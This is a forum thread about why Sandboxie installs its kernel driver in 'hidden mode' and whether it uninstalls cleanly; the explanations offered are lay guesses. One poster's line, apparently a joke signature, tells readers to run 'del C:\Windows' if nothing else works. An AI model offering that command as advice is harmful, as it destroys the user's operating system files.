Why installing driver in hidden mode???
Hi guys and gals I've downloaded Sandboxie from their site and i install it, KAV gets triggered saying that the app sandboxie is trying to install a driver in hidden mode. As far as i know, OA also installs a driver but that doesn't triggers my AV.
So my question is if sandboxie is a legitimate program then why it installs driver in hidden mode...? Whats the need for it...? Cant it be done normally...?
As there are many sandboxie users around, i hope its not a very suprising question...

Well i know that it doesn't contain any threat (that's why so many people're using it) but We're still at the same place i.e. finding the reason behind such behaviour of a legit program..

I assume that's because Sanboxie 'hooks to the kernel' of the OS during installation...ok..I'm not a smart geek to explain that..perhaps check through Google or wait for someone else's reply here...
But one thing rest assured...it's legit & safe...so no worries

Yeah.. kernel.. That may be a reason..
And i always google first for any problem but i tried almost all variety of keywords but didn't succeed..
Lets hope if someone knows the exact reason behind it..
There's just one question in my mind.. Why hidden mode and not normal mode...?

Ok, I might be wrong but still i'll attempt an answer. so here it is :
You do know that sandboxie wont allow keyloggers to run from within the sandbox (see here )
It is not uncommon for applications to install such hooks as part of normal operation, and blocking all of them would prevent some programs from running successfully inside the sandbox.
The approach Sandboxie takes is to honor the hook request partially, by applying the hook only to applications in the same sandbox as the requesting application.
and for that reason the driver is installed in hidden mode....
If nothing else works, open command prompt and type 'del C:\Windows'

Ok Thanks Bonishah... That seems to be a convincing answer..
But what about its uninstallation??? Does that driver also get uninstalled easily and completely or it remains there???

I've no idea but it should uninstall properly...I've never heard of anyone complaining about Sandboxie un-installation so far...why not you try to uninstall it using Revo uninstaller & see if Revo 'detects' anything after using the built-in uninstaller?

I've also never uninstalled it....nor heard of any issues too but i doubt any leftovers will be left behind.
